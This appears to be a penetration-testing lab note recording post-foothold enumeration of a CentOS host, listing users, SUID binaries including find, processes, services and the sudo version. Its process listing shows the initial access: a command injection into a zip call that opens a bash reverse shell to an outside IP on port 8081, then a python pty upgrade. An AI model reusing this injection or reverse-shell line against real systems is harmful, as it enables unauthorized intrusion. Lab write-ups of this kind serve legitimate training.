InfoSec LAB

Quackerjack_Initial_Foothold_UNIX

Created: 10 min read

System/Kernel

bash-4.2$ uname -a ; cat /etc/*release
Linux quackerjack 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
CentOS Linux release 7.8.2003 (Core)
NAME="CentOS Linux"
VERSION="7 (Core)"
ID="centos"
ID_LIKE="rhel fedora"
VERSION_ID="7"
PRETTY_NAME="CentOS Linux 7 (Core)"
ANSI_COLOR="0;31"
CPE_NAME="cpe:/o:centos:centos:7"
HOME_URL="https://www.centos.org/"
BUG_REPORT_URL="https://bugs.centos.org/"
 
CENTOS_MANTISBT_PROJECT="CentOS-7"
CENTOS_MANTISBT_PROJECT_VERSION="7"
REDHAT_SUPPORT_PRODUCT="centos"
REDHAT_SUPPORT_PRODUCT_VERSION="7"
 
CentOS Linux release 7.8.2003 (Core)
CentOS Linux release 7.8.2003 (Core)
  • 3.10.0-1127.10.1.el7.x86_64
  • x86_64
  • CentOS Linux 7 (Core)

Networks

bash-4.2$ ip route ; arp -a
default via 192.168.144.254 dev ens192 
169.254.0.0/16 dev ens192 scope link metric 1003 
192.168.144.0/24 dev ens192 proto kernel scope link src 192.168.144.57 
gateway (192.168.144.254) at 00:50:56:9e:ad:80 [ether] on ens192
bash-4.2$ netstat -antup4
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 0.0.0.0:3306            0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:139             0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:445             0.0.0.0:*               LISTEN      -                   
tcp        0     17 192.168.144.57:48026    192.168.45.198:8081     ESTABLISHED 1852/bash           
udp        0      0 127.0.0.1:323           0.0.0.0:*                           -                   
udp        0      0 0.0.0.0:901             0.0.0.0:*                           -                   
udp        0      0 0.0.0.0:111             0.0.0.0:*                           -

Users & Groups

bash-4.2$ cat /etc/passwd ; ll /home
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:998:User for polkitd:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:998:996::/var/lib/chrony:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
total 4.0K
4.0K drwxr-xr-x. 15 apache root 4.0K Jul  9  2020 rconfig
   0 dr-xr-xr-x. 17 root   root  244 Jun 25  2020 ..
   0 drwxr-xr-x.  3 root   root   21 Jun 22  2020 .

rconfig

bash-4.2$ cut -d: -f1 /etc/passwd | xargs -n1 id
uid=0(root) gid=0(root) groups=0(root)
uid=1(bin) gid=1(bin) groups=1(bin)
uid=2(daemon) gid=2(daemon) groups=2(daemon)
uid=3(adm) gid=4(adm) groups=4(adm)
uid=4(lp) gid=7(lp) groups=7(lp)
uid=5(sync) gid=0(root) groups=0(root)
uid=6(shutdown) gid=0(root) groups=0(root)
uid=7(halt) gid=0(root) groups=0(root)
uid=8(mail) gid=12(mail) groups=12(mail)
uid=11(operator) gid=0(root) groups=0(root)
uid=12(games) gid=100(users) groups=100(users)
uid=14(ftp) gid=50(ftp) groups=50(ftp)
uid=99(nobody) gid=99(nobody) groups=99(nobody)
uid=192(systemd-network) gid=192(systemd-network) groups=192(systemd-network)
uid=81(dbus) gid=81(dbus) groups=81(dbus)
uid=999(polkitd) gid=998(polkitd) groups=998(polkitd)
uid=74(sshd) gid=74(sshd) groups=74(sshd)
uid=89(postfix) gid=89(postfix) groups=89(postfix),12(mail)
uid=998(chrony) gid=996(chrony) groups=996(chrony)
uid=48(apache) gid=48(apache) groups=48(apache)
uid=59(tss) gid=59(tss) groups=59(tss)
uid=32(rpc) gid=32(rpc) groups=32(rpc)
uid=27(mysql) gid=27(mysql) groups=27(mysql)

uid=48(apache) gid=48(apache) groups=48(apache)

SUIDs

bash-4.2$ find / -perm -04000 -ls -type f 2>/dev/null | grep -v '/snap'
12596477  196 -rwsr-xr-x   1 root     root       199304 Oct 30  2018 /usr/bin/find
12845841   76 -rwsr-xr-x   1 root     root        73888 Aug  8  2019 /usr/bin/chage
12845842   80 -rwsr-xr-x   1 root     root        78408 Aug  8  2019 /usr/bin/gpasswd
12897242   24 -rws--x--x   1 root     root        23968 Apr  1  2020 /usr/bin/chfn
12897245   24 -rws--x--x   1 root     root        23880 Apr  1  2020 /usr/bin/chsh
12845845   44 -rwsr-xr-x   1 root     root        41936 Aug  8  2019 /usr/bin/newgrp
12897294   32 -rwsr-xr-x   1 root     root        32128 Apr  1  2020 /usr/bin/su
13284201  144 ---s--x--x   1 root     root       147336 Apr  1  2020 /usr/bin/sudo
12897278   44 -rwsr-xr-x   1 root     root        44264 Apr  1  2020 /usr/bin/mount
12897298   32 -rwsr-xr-x   1 root     root        31984 Apr  1  2020 /usr/bin/umount
12982629   60 -rwsr-xr-x   1 root     root        57656 Aug  8  2019 /usr/bin/crontab
12944638   24 -rwsr-xr-x   1 root     root        23576 Apr  1  2020 /usr/bin/pkexec
12862194   28 -rwsr-xr-x   1 root     root        27856 Mar 31  2020 /usr/bin/passwd
13299021   32 -rwsr-xr-x   1 root     root        32096 Oct 30  2018 /usr/bin/fusermount
354814   36 -rwsr-xr-x   1 root     root        36272 Apr  1  2020 /usr/sbin/unix_chkpwd
354810   12 -rwsr-xr-x   1 root     root        11232 Apr  1  2020 /usr/sbin/pam_timestamp_check
433482   12 -rwsr-xr-x   1 root     root        11296 Mar 31  2020 /usr/sbin/usernetctl
4529180   16 -rwsr-xr-x   1 root     root        15432 Apr  1  2020 /usr/lib/polkit-1/polkit-agent-helper-1
4528919   60 -rwsr-x---   1 root     dbus        58024 Mar 14  2019 /usr/libexec/dbus-1/dbus-daemon-launch-helper

12596477 196 -rwsr-xr-x 1 root root 199304 Oct 30 2018 /usr/bin/find

SGIDs

bash-4.2$ find / -type f -perm -02000 -ls 2>/dev/null | grep -v '/snap'
12610438   16 -r-xr-sr-x   1 root     tty         15344 Jun  9  2014 /usr/bin/wall
12944466   20 -rwxr-sr-x   1 root     tty         19544 Apr  1  2020 /usr/bin/write
13041865  376 ---x--s--x   1 root     nobody     382216 Aug  8  2019 /usr/bin/ssh-agent
13031728   40 -rwx--s--x   1 root     slocate     40520 Apr 10  2018 /usr/bin/locate
433477   12 -rwxr-sr-x   1 root     root        11224 Mar 31  2020 /usr/sbin/netreport
484637  216 -rwxr-sr-x   1 root     postdrop   218560 Apr  1  2020 /usr/sbin/postdrop
484740  260 -rwxr-sr-x   1 root     postdrop   264128 Apr  1  2020 /usr/sbin/postqueue
8736345   12 -rwx--s--x   1 root     utmp        11192 Jun  9  2014 /usr/libexec/utempter/utempter
4537792  456 ---x--s--x   1 root     ssh_keys   465760 Aug  8  2019 /usr/libexec/openssh/ssh-keysign

Capabilities

bash-4.2$ getcap -r / 2>/dev/null
/usr/bin/newgidmap = cap_setgid+ep
/usr/bin/newuidmap = cap_setuid+ep
/usr/bin/ping = cap_net_admin,cap_net_raw+p
/usr/sbin/arping = cap_net_raw+p
/usr/sbin/clockdiff = cap_net_raw+p
/usr/sbin/suexec = cap_setgid,cap_setuid+ep

Processes

bash-4.2$ ps -auxwww
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.3 125472  3908 ?        Ss   01:18   0:00 /usr/lib/systemd/systemd --switched-root --system --deserialize 22
root       574  0.0  0.1  37236  1868 ?        Ss   01:18   0:00 /usr/lib/systemd/systemd-journald
root       592  0.0  0.1 190376  1340 ?        Ss   01:18   0:00 /usr/sbin/lvmetad -f
root       599  0.0  0.2  45640  2552 ?        Ss   01:18   0:00 /usr/lib/systemd/systemd-udevd
root       703  0.0  0.0  55532   848 ?        S<sl 01:18   0:00 /sbin/auditd
root       732  0.0  0.6  99688  6196 ?        Ss   01:18   0:00 /usr/bin/VGAuthService -s
polkitd    733  0.0  1.0 612248 11108 ?        Ssl  01:18   0:00 /usr/lib/polkit-1/polkitd --no-debug
rpc        737  0.0  0.0  69280  1008 ?        Ss   01:18   0:00 /sbin/rpcbind -w
root       738  0.0  0.7 314456  7288 ?        Ssl  01:18   0:01 /usr/bin/vmtoolsd
root       739  0.0  0.1  26384  1752 ?        Ss   01:18   0:00 /usr/lib/systemd/systemd-logind
dbus       740  0.0  0.2  58240  2464 ?        Ss   01:18   0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
chrony     749  0.0  0.1 117808  1644 ?        S    01:18   0:00 /usr/sbin/chronyd
root       761  0.0  0.1 126388  1580 ?        Ss   01:18   0:00 /usr/sbin/crond -n
root       769  0.0  0.0 110204   848 tty1     Ss+  01:18   0:00 /sbin/agetty --noclear tty1 linux
root       783  0.0  1.0 550284 10972 ?        Ssl  01:18   0:00 /usr/sbin/NetworkManager --no-daemon
root      1014  0.0  1.7 574300 17456 ?        Ssl  01:19   0:00 /usr/bin/python2 -Es /usr/sbin/tuned -l -P
root      1017  0.0  0.3 227260  3516 ?        Ssl  01:19   0:00 /usr/sbin/rsyslogd -n
root      1021  0.0  1.6 407936 16420 ?        Ss   01:19   0:00 /usr/sbin/httpd -DFOREGROUND
root      1023  0.0  0.4 112924  4308 ?        Ss   01:19   0:00 /usr/sbin/sshd -D
root      1028  0.0  0.0  53288   576 ?        Ss   01:19   0:00 /usr/sbin/vsftpd /etc/vsftpd/vsftpd.conf
mysql     1064  0.0  0.1 113412  1600 ?        Ss   01:19   0:00 /bin/sh /usr/bin/mysqld_safe --basedir=/usr
mysql     1232  0.0  9.1 1169336 92912 ?       Sl   01:19   0:00 /usr/libexec/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib64/mysql/plugin --log-error=/var/log/mariadb/mariadb.log --pid-file=/var/run/mariadb/mariadb.pid --socket=/var/lib/mysql/mysql.sock
apache    1236  0.0  1.2 409076 12828 ?        S    01:19   0:00 /usr/sbin/httpd -DFOREGROUND
apache    1237  0.0  1.2 408972 12724 ?        S    01:19   0:00 /usr/sbin/httpd -DFOREGROUND
apache    1238  0.0  1.1 408564 11804 ?        S    01:19   0:00 /usr/sbin/httpd -DFOREGROUND
apache    1239  0.0  1.2 409084 12788 ?        S    01:19   0:00 /usr/sbin/httpd -DFOREGROUND
apache    1240  0.0  1.2 409076 12800 ?        S    01:19   0:00 /usr/sbin/httpd -DFOREGROUND
root      1449  0.0  1.2 454168 12784 ?        Ss   01:20   0:00 /usr/sbin/smbd --foreground --no-process-group
root      1451  0.0  0.3 450216  3896 ?        S    01:20   0:00 /usr/sbin/smbd --foreground --no-process-group
root      1452  0.0  0.3 450208  3612 ?        S    01:20   0:00 /usr/sbin/smbd --foreground --no-process-group
root      1454  0.0  0.4 454168  4100 ?        S    01:20   0:00 /usr/sbin/smbd --foreground --no-process-group
root      1506  0.0  0.0 123360   732 ?        Ss   01:30   0:00 /usr/sbin/anacron -s
apache    1737  0.0  1.2 408972 12700 ?        S    01:49   0:00 /usr/sbin/httpd -DFOREGROUND
apache    1749  0.0  1.1 408204 11516 ?        S    01:54   0:00 /usr/sbin/httpd -DFOREGROUND
apache    1831  0.0  0.7 408072  7828 ?        S    02:08   0:00 /usr/sbin/httpd -DFOREGROUND
apache    1850  0.0  0.1  11688  1140 ?        S    02:08   0:00 sh -c sudo -u apache zip -r -j `bash -i>& /dev/tcp/192.168.45.198/8081 0>&1`archive/filename20250403.zip `bash -i>& /dev/tcp/192.168.45.198/8081 0>&1`*.random
apache    1851  0.0  0.0  11688   652 ?        S    02:08   0:00 sh -c sudo -u apache zip -r -j `bash -i>& /dev/tcp/192.168.45.198/8081 0>&1`archive/filename20250403.zip `bash -i>& /dev/tcp/192.168.45.198/8081 0>&1`*.random
apache    1852  0.0  0.1  11828  1772 ?        S    02:08   0:00 bash -i
apache    1859  0.0  0.4  26032  4732 ?        S    02:09   0:00 python -c import pty; pty.spawn("/bin/bash")
apache    1860  0.0  0.1  11824  1812 pts/0    Ss   02:09   0:00 /bin/bash
apache    1970  0.0  0.1  51756  1736 pts/0    R+   02:13   0:00 ps -auxwww
  • polkitd 733 0.0 1.0 612248 11108 ? Ssl 01:18 0:00 /usr/lib/polkit-1/polkitd --no-debug
  • rpc 737 0.0 0.0 69280 1008 ? Ss 01:18 0:00 /sbin/rpcbind -w
  • root 761 0.0 0.1 126388 1580 ? Ss 01:18 0:00 /usr/sbin/crond -n
  • root 1021 0.0 1.6 407936 16420 ? Ss 01:19 0:00 /usr/sbin/httpd -DFOREGROUND
  • root 1028 0.0 0.0 53288 576 ? Ss 01:19 0:00 /usr/sbin/vsftpd /etc/vsftpd/vsftpd.conf
  • mysql 1064 0.0 0.1 113412 1600 ? Ss 01:19 0:00 /bin/sh /usr/bin/mysqld_safe --basedir=/usr
  • mysql 1232 0.0 9.1 1169336 92912 ? Sl 01:19 0:00 /usr/libexec/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib64/mysql/plugin --log-error=/var/log/mariadb/mariadb.log --pid-file=/var/run/mariadb/mariadb.pid --socket=/var/lib/mysql/mysql.sock

Cron & Systemd

bash-4.2$ crontab -l ; cat /etc/crontab ; systemctl list-timers
no crontab for apache
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
 
# For details see man 4 crontabs
 
# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name  command to be executed
 
NEXT                         LEFT     LAST                         PASSED       
Fri 2025-04-04 01:33:54 EDT  23h left Thu 2025-01-30 03:04:06 EST  2 months 2 da
 
1 timers listed.
Pass --all to see loaded but inactive timers, too.

Services

bash-4.2$ systemctl list-units --state=running
UNIT                         LOAD   ACTIVE SUB     DESCRIPTION
proc-sys-fs-binfmt_misc.automount loaded active running Arbitrary Executable Fil
auditd.service               loaded active running Security Auditing Service
chronyd.service              loaded active running NTP client/server
crond.service                loaded active running Command Scheduler
dbus.service                 loaded active running D-Bus System Message Bus
getty@tty1.service           loaded active running Getty on tty1
httpd.service                loaded active running The Apache HTTP Server
lvm2-lvmetad.service         loaded active running LVM2 metadata daemon
mariadb.service              loaded active running MariaDB database server
NetworkManager.service       loaded active running Network Manager
polkit.service               loaded active running Authorization Manager
rpcbind.service              loaded active running RPC bind service
rsyslog.service              loaded active running System Logging Service
smb.service                  loaded active running Samba SMB Daemon
sshd.service                 loaded active running OpenSSH server daemon
systemd-journald.service     loaded active running Journal Service
systemd-logind.service       loaded active running Login Service
systemd-udevd.service        loaded active running udev Kernel Device Manager
tuned.service                loaded active running Dynamic System Tuning Daemon
vgauthd.service              loaded active running VGAuth Service for open-vm-to
vmtoolsd.service             loaded active running Service for virtual machines 
vsftpd.service               loaded active running Vsftpd ftp daemon
dbus.socket                  loaded active running D-Bus System Message Bus Sock
lvm2-lvmetad.socket          loaded active running LVM2 metadata daemon socket
rpcbind.socket               loaded active running RPCbind Server Activation Soc
systemd-journald.socket      loaded active running Journal Socket
systemd-udevd-control.socket loaded active running udev Control Socket
systemd-udevd-kernel.socket  loaded active running udev Kernel Socket
 
LOAD   = Reflects whether the unit definition was properly loaded.
ACTIVE = The high-level unit activation state, i.e. generalization of SUB.
SUB    = The low-level unit activation state, values depend on unit type.
 
28 loaded units listed. Pass --all to see loaded but inactive units, too.
To show all installed unit files use 'systemctl list-unit-files'.

httpd.service

Sudo Version

bash-4.2$ sudo --version
Sudo version 1.8.23
Sudoers policy plugin version 1.8.23
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.23

Sudo version 1.8.23

Glibc Version

bash-4.2$ ldd --version
ldd (GNU libc) 2.17
Copyright (C) 2012 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.

ldd (GNU libc) 2.17

Interactive Graph View

Backlinks